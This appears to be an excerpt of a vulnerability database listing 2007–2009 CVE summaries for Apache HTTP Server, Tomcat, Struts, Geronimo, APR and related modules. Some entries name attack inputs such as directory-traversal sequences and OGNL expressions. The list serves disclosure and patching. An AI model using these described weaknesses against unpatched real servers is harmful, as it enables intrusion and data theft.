15024| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
15025| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
15026| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
15027| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
15028| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
15029| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
15030| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
15031| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
15032| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
15033| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
15034| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
15035| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
15036| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
15037| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
15038| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
15039| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
15040| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
15041| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
15042| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
15043| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
15044| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
15045| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
15046| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
15047| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
15048| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
15049| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
15050| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
15051| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
15052| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
15053| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
15054| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
15055| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
15056| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
15057| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
15058| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
15059| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
15060| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
15061| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
15062| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
15063| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
15064| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
15065| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
15066| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
15067| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
15068| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
15069| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
15070| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
15071| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
15072| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
15073| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
15074| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
15075| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
15076| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
15077| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
15078| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
15079| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
15080| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
15081| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
15082| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
15083| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
15084| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
15085| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
15086| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
15087| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
15088| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
15089| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
15090| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
15091| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
15092| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
15093| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
15094| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
15095| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
15096| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
15097| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
15098| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
15099| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
15100| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
15101| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
15102| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
15103| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
15104| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
15105| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
15106| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
15107| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
15108| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
15109| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
15110| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
15111| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
15112| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
15113| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
15114| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
15115| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
15116| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
15117| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
15118| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
15119| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
15120| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
15121| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
15122| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
15123| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
15124| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
15125| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
15126| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
15127| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
15128| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
15129| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
15130| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
